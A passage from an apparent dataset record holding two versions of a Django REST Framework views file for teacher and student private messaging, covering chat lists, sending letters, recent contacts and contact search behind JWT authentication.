'返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuSearchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n",
"step-4": "from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom ex.models import Teacher, Student, Group, Report, TeamEvaluation, PrivateLetter, ChatBoxIsOpen\nfrom django.core import serializers\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.contrib.auth.hashers import make_password, check_password\nimport os\nfrom ex.utils.jwt_auth import create_token, get_user_id\nfrom ex.utils.extensions.auth import JwtQueryParamAuthentication\nfrom django.db.models import Q\n\n\nclass getPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverTea_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverTea_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass enterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderTea_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) & Q(receiverTea_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,\n receiverTea_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderTea_id=user_id,\n receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & Q(receiverTea_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverTea_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass getRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderTea_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverTea_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass closeChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass openChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass searchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuGetPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuEnterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,\n receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverStu_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuCloseChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuOpenChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuSearchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n",
"step-5": "from django.shortcuts import render\nfrom django.http import HttpResponse,JsonResponse\nfrom ex.models import Teacher,Student,Group,Report,TeamEvaluation,PrivateLetter,ChatBoxIsOpen\nfrom django.core import serializers\n\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.contrib.auth.hashers import make_password, check_password\n# from plane.models import User, Student, LightList, Light, Score, Visit\n# from plane.utils.jwt_auth import create_token, get_user_id\n# from django.contrib.auth.hashers import make_password, check_password\n\n# from rest_framework.authtoken.models import Token\n# from django.contrib.auth import authenticate\n\nimport os\n\nfrom ex.utils.jwt_auth import create_token, get_user_id\n\nfrom ex.utils.extensions.auth import JwtQueryParamAuthentication\n\nfrom django.db.models import Q\n\n# Create your views here.\n\nclass getPrivateLetterListsView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n \n user_id = payload['id']\n \n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=item.receiverStu_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 1 # 发送\n }\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(senderStu_id=item.receiverStu_id) & Q(receiverTea_id=user_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 2 # 接收\n }\n msgList2.append(data)\n # msgList.sort()\n # print(len(msgList1))\n else:\n for item2 in PrivateLetter.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 1 # 发送\n }\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(senderTea_id=receiver) & Q(receiverTea_id=user_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 2 # 接收\n }\n msgList2.append(data)\n # msgList.sort()\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0,len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2+=1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1+=1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1+=1\n else:\n msgList.append(msgList2[i2])\n i2+=1\n\n # print(msgList)\n data = {\n 'id': item.id,\n 'receiver': receiver,\n 'msgList': msgList,\n 'name': receiver + str(identity),\n 'identity': identity\n }\n data_list.append(data)\n # print(data_list)\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data_list\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\nclass enterPrivateLetterView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n\n if identity == 0:\n privateLetter = PrivateLetter(senderTea_id=user_id,receiverTea_id=receiver,message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=receiver)&Q(receiverTea_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,receiverTea_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver).first().id\n privateLetter = PrivateLetter(senderTea_id=user_id,receiverStu_id=receiverStu_id,message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=receiverStu_id)&Q(receiverTea_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=receiverStu_id,receiverTea_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n\n return Response({\n 'status': 200,\n 'msg': '发布私信成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 获取最近联系人\nclass getRecentContactsView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n \n data_list = []\n for item in PrivateLetter.objects.filter(senderTea_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != \"\":\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num\n # print(((receiver + str(identity)) not in dict))\n # if (receiver + str(identity)) not in dict:\n # dict[receiver + str(identity)] = '1'\n data = {\n # 'id': item.id,\n 'receiver': receiver,\n 'identity': identity #老师:0;学生:1\n }\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverTea_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != \"\":\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id).first().stu_num\n # print(((receiver + str(identity)) not in dict))\n # if (receiver + str(identity)) not in dict:\n # dict[receiver + str(identity)] = '1'\n data = {\n # 'id': item.id,\n 'receiver': receiver,\n 'identity': identity #老师:0;学生:1\n }\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1,-1,-1):\n if (data_list[i]['receiver'] + str(data_list[i]['identity'])) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i]['identity'])] = '1'\n data_list1.append(data_list[i])\n\n # lenData = len(data_list1)\n # if lenData > 10:\n # data_list1 = data_list1[lenData - 10:lenData]\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data_list1\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 关闭聊天框\nclass closeChatBoxView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n \n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=Student.objects.filter(stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 打开聊天框\nclass openChatBoxView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n \n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\n# 搜索联系人\nclass searchContactView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n user_id = payload['id']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n # print(receiver,identity=='0')\n\n # user = Teacher.objects.filter(id=username).first()\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {\n 'identity': iden,\n 'receiver': receiver\n }\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\nclass stuGetPrivateLetterListsView(APIView):\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self, request)[0]\n except Exception as e:\n return Response({\n 'status': 403,\n 'msg': '未登录',\n 'err': e.args\n })\n user_id = payload['id']\n username = payload['username']\n # print(user_id,username)\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=item.receiverStu_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 1 # 发送\n }\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(senderStu_id=item.receiverStu_id) & Q(receiverStu_id=user_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 2 # 接收\n }\n msgList2.append(data)\n # msgList.sort()\n # print(len(msgList1))\n else:\n for item2 in PrivateLetter.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 1 # 发送\n }\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {\n 'id': item2.id,\n 'message': item2.message,\n 'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),\n 'new': item2.new,\n 'Ienter': 2 # 接收\n }\n msgList2.append(data)\n # msgList.sort()\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0,len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2+=1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1+=1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1+=1\n else:\n msgList.append(msgList2[i2])\n i2+=1\n\n # print(msgList)\n data = {\n 'id': item.id,\n 'receiver': receiver,\n 'msgList': msgList,\n 'name': receiver + str(identity),\n 'identity': identity\n }\n data_list.append(data)\n # print(data_list)\n return Response({\n 'status': 200,\n 'msg': '返回成功',\n 'data': data_list\n })\n except Exception as e:\n return Response({\n 'status': 204,\n 'msg': '遇到了异常错误',\n 'err': e.args\n })\n\nclass stuEnterPrivateLetterView(APIView):\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = 